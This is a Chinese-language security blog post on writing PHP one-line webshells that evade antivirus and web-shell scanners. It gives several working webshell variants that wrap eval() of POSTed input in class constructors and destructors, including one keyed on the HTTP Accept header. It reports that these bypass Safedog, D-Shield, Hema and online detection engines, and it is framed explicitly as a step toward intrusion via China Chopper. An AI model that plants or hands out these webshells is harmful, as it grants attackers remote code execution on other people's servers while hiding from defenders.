<!DOCTYPE html>
<html lang="zh-cn" >
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Lioders" />
	
	
	
	<title>免杀shell尝试 ｜ </title>
	
    
    
    <meta name="description" content="0x00 shell编写思路 目前我们一句话shell的编写归根揭底就为命令执行, 只要最后代码命令执行我们外部参数就可称为webshell了，而菜刀的出现也是方便我们使用，我们这时候就用简短的一句话实现我们下一" />
    

    
    
    <meta name="keywords" content="Hugo, Lioders" />
    

	
    
    <link rel="shortcut icon" href="http://example.org/images/favicon.ico" />

    <link rel="stylesheet" type="text/css" media="screen" href="http://example.org/css/normalize.css" />
    <link rel="stylesheet" type="text/css" media="screen" href="https://cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" />
    <link rel="stylesheet" type="text/css" media="screen" href="http://example.org/css/zozo.css" />
	<link rel="stylesheet" type="text/css" media="screen" href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" />
    <link rel="stylesheet" type="text/css" media="screen" href="http://example.org/css/highlight.css" />

    
    
</head>

<body>
    <div class="main animate__animated animate__fadeInDown">
        <div class="nav_container animated fadeInDown">
    <div class="site_nav" id="site_nav">
        <ul>
            
            <li>
                <a href="/">Home</a>
            </li>
            
            <li>
                <a href="/posts/">Archive</a>
            </li>
            
            <li>
                <a href="/tags/">Tags</a>
            </li>
            
            <li>
                <a href="/about/">About</a>
            </li>
            
        </ul>
    </div>
    <div class="menu_icon">
        <a id="menu_icon"><i class="ri-menu-line"></i></a>
    </div>
</div>
        <div class="header animated fadeInDown">
    <div class="site_title_container">
        <div class="site_title">
            <h1>
                <a href="http://example.org/">
                    <span></span>
                </a>
            </h1>
        </div>
        <div class="description">
            <p class="sub_title">lioders &#39;s blog</p>
            <div class="my_socials">
                
                
                <a href="https://github.com/LiodAir" title="github" target="_blank"><i class="ri-github-fill"></i></a>
                
                
                <a href="http://example.org/index.xml" type="application/rss+xml" title="rss" target="_blank"><i
                        class="ri-rss-fill"></i></a>
            </div>
        </div>
    </div>
</div>
        <div class="content">
            <div class="post_page">
                <div class="post animate__animated animate__fadeInDown">
                    <div class="post_title post_detail_title">
                        <h2><a href='/posts/%E5%85%8D%E6%9D%80shell%E5%B0%9D%E8%AF%95u/'>免杀shell尝试</a></h2>
                        <span class="date">2017.10.15</span>
                    </div>
                    <div class="post_content markdown"><h2 id="0x00--shell编写思路">0x00  shell编写思路</h2>
<p>目前我们一句话shell的编写归根揭底就为命令执行, 只要最后代码命令执行我们外部参数就可称为webshell了，而菜刀的出现也是方便我们使用，我们这时候就用简短的一句话实现我们下一步入侵的功能
,而一般php的命令执行:</p>
<blockquote>
<p>php命令执行函数,分为两种(执行php代码的eval、assert),执行系统命令函数的(system、exec、popen)</p>
</blockquote>
<p>言而总之让我们的代码最后可以<code>eval($_POST['pass'])</code>就可以了，然而你正常的在代码里写是绝对会被防护软件杀的,我的思路是在类里面写命令执行函数,看安全狗敏不敏感,事实上此思路来自某次审计cms，他们并没有你想的那么智能的拦截</p>
<p>某次看到一个这样的文件</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="k">class</span> <span class="nc">test</span><span class="p">{</span>
    <span class="k">public</span> <span class="k">function</span> <span class="nf">__contruct</span><span class="p">(</span><span class="nv">$xx</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span><span class="p">){</span>
		<span class="nv">$this</span><span class="o">-&gt;</span><span class="na">xx</span> <span class="o">=</span> <span class="nv">$xx</span><span class="p">;</span>
<span class="p">}</span>

	<span class="k">public</span> <span class="k">function</span> <span class="fm">__destruct</span><span class="p">(){</span>
		<span class="k">eval</span><span class="p">(</span><span class="nx">serialize</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">xx</span><span class="p">))</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div><p>这样的文件一般会拦截吗,我分别使用了安全狗,webkill，d盾 尝试结果如下:
我写了这样一个文件</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="k">class</span> <span class="nc">test</span><span class="p">{</span>
    <span class="k">public</span> <span class="nx">ex</span><span class="p">(</span><span class="nv">$str</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span><span class="p">){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$str</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div><p><img src="attachments/contributeupload/180513160566cf0d7fb5a59fc7.png" alt=""></p>
<h2 id="0x02-实验尝试">0x02 实验尝试</h2>
<p>只有d盾对其拦截了，当我们把这个类引入构造函数__contruct 和解构函数时__destruct,构造一句话为</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
<span class="k">class</span> <span class="nc">OowoO</span><span class="p">{</span>
    <span class="k">public</span> <span class="nv">$mdzz</span><span class="p">;</span>
    <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$str</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span><span class="p">){</span>
        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">mdzz</span> <span class="o">=</span> <span class="nv">$str</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="fm">__destruct</span><span class="p">(){</span>
        <span class="k">eval</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">mdzz</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">&#34;pass&#34;</span><span class="p">])){</span>
    <span class="nv">$m</span><span class="o">=</span> <span class="k">new</span> <span class="nx">OowoO</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">&#34;pass&#34;</span><span class="p">]);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><p>菜刀连接尝试
<img src="attachments/contributeupload/1805131617b4c05c06b90f6919.png" alt="">
<img src="attachments/contributeupload/1805131618806b11ece90ea0f5.png" alt="">
当然了这样的基本上d盾和安全狗还有河马的桌面版是不会杀的
我们得出的结论,安全查杀并没有对php类的构造函数和魔术方法进行查杀和检测，我们这样一想可扩展的地方多了(从混淆传入的字符使用回调函数进行代码执行,正则等，加密？？？)</p>
<p>##0x03 扩展引用
这里引用tools的大佬文章的扩展绕过沙盒和人工智能的在线webshell进行查杀的思路,菜刀配置为:
<img src="!%5B%5D(attachments/contributeupload/1805131656d892c774eed9d49a.png)" alt="">
shell如下:</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
<span class="c1">#error_reporting(5);
</span><span class="c1">#ini_set(&#39;session_serialize_handler&#39;, &#39;php&#39;);
</span><span class="c1">#session_start();
</span><span class="c1"></span><span class="k">class</span> <span class="nc">OowoO</span><span class="p">{</span>
    <span class="k">public</span> <span class="nv">$mdzz</span><span class="p">;</span>
    <span class="k">public</span> <span class="nv">$func</span><span class="p">;</span>
    <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$str</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span><span class="p">){</span>
        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">mdzz</span> <span class="o">=</span> <span class="nv">$str</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="fm">__destruct</span><span class="p">(){</span>
        <span class="k">if</span><span class="p">(</span><span class="nx">strlen</span><span class="p">(</span><span class="nx">substr</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">,</span><span class="nx">strripos</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">,</span><span class="s2">&#34;/&#34;</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">-</span><span class="mi">4</span> <span class="o">&lt;</span><span class="mi">5</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="k">eval</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">mdzz</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">&#34;</span><span class="si">$_SERVER[HTTP_ACCEPT]</span><span class="s2">&#34;</span><span class="p">])){</span>
    <span class="nv">$m</span><span class="o">=</span> <span class="k">new</span> <span class="nx">OowoO</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">&#34;</span><span class="si">$_SERVER[HTTP_ACCEPT]</span><span class="s2">&#34;</span><span class="p">],</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;func&#39;</span><span class="p">]);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><p>尝试对大佬说的几个在线进行测试</p>
<blockquote>
<p>BugScaner killwebshell 链接地址 <a href="http://tools.bugscaner.com/killwebshell/">http://tools.bugscaner.com/killwebshell/</a>
<img src="attachments/contributeupload/1805131632f01b12f7926714c9.png" alt=""></p>
</blockquote>
<blockquote>
<p>河马专业版查杀Webshell 链接地址<a href="http://n.shellpub.com/">http://n.shellpub.com/</a>
<img src="attachments/contributeupload/1805131641d6d33e6d2512ee2d.png" alt=""></p>
</blockquote>
<blockquote>
<p>OpenRASP WEBDIR+检测引擎 链接地址 <a href="https://scanner.baidu.com">https://scanner.baidu.com</a>
<img src="attachments/contributeupload/18051316452df41af210262443.png" alt=""></p>
</blockquote>
<blockquote>
<p>PHP webshel​​l检测的深度学习模型 链接地址<a href="http://webshell.cdxy.me/">http://webshell.cdxy.me/</a>
<img src="attachments/contributeupload/18051316502d730c901861622c.png" alt="">
*我感觉是eval在代码里出现被检测了,其实深度学习的模型应该是像后门的框架库一样去学习检测吧,后来在解构函数代码利用回调函数拼接字符继续bypass
<img src="attachments/contributeupload/180513165488eb7a432a6f99b1.png" alt=""></p>
</blockquote>
<h2 id="0x04-总结">0x04 总结</h2>
<p>传统通过匹配文中特殊函数的检测可以外部传入特殊函数,或者利用字符特性进行编码或部分传入,其实很大一部分都是特征, 针对一句话来讲我们绕过的优势还是很大的,其实难点在于如何连接菜刀时不被拦截,我感觉这才是我们绕过防护最难之处</p>
</div>
                    <div class="post_footer">
                        
                    </div>
                </div>
                
                
                <div class="doc_comments"></div>
                
            </div>
        </div>
    </div>
    <a id="back_to_top" href="#" class="back_to_top"><i class="ri-arrow-up-s-line"></i></a>
    <footer class="footer">
    <div class="powered_by">
        <a href="https://varkai.com">Designed by VarKai,</a>
        <a href="http://www.gohugo.io/">Proudly published with Hugo</a>
    </div>

    <div class="footer_slogan">
        <span>梦想被扼杀的第一个征候就是抱怨没有时间</span>
    </div>
</footer>
    <script src="http://example.org/js/jquery-3.5.1.min.js"></script>
<link href="http://example.org/css/fancybox.min.css" rel="stylesheet">
<script src="http://example.org/js/fancybox.min.js"></script>
<script src="http://example.org/js/zozo.js"></script>




</body>

</html>